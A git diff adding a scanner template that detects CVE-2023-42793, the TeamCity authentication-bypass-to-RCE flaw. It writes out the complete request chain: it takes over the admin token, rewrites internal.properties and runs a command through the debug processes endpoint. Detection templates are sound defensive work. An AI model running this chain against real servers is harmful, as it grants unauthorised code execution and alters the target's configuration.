diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
new file mode 100644
index 00000000000..fb9b0fc02b6
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -0,0 +1,78 @@
+id: CVE-2023-42793
+
+info:
+  name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
+  reference:
+    - https://www.jetbrains.com/privacy-security/issues-fixed/
+    - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
+    - https://www.sonarsource.com/blog/teamcity-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-42793
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-42793
+    cwe-id: CWE-288
+    epss-score: 0.00091
+    epss-percentile: 0.38288
+    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 5
+    verified: true
+    shodan-query: title:TeamCity
+    fofa-query: title=TeamCity
+    vendor: jetbrains
+    product: teamcity
+  tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive
+
+http:
+  - raw:
+      - |
+        DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '<token name="RPC2" creationTime'
+
+      - type: word
+        part: body_5
+        words:
+          - 'StdOut:{{randstr}}'
+
+    extractors:
+      - type: regex
+        part: body_2
+        name: token
+        group: 1
+        regex:
+          - 'value="(.*?)"'
+        internal: true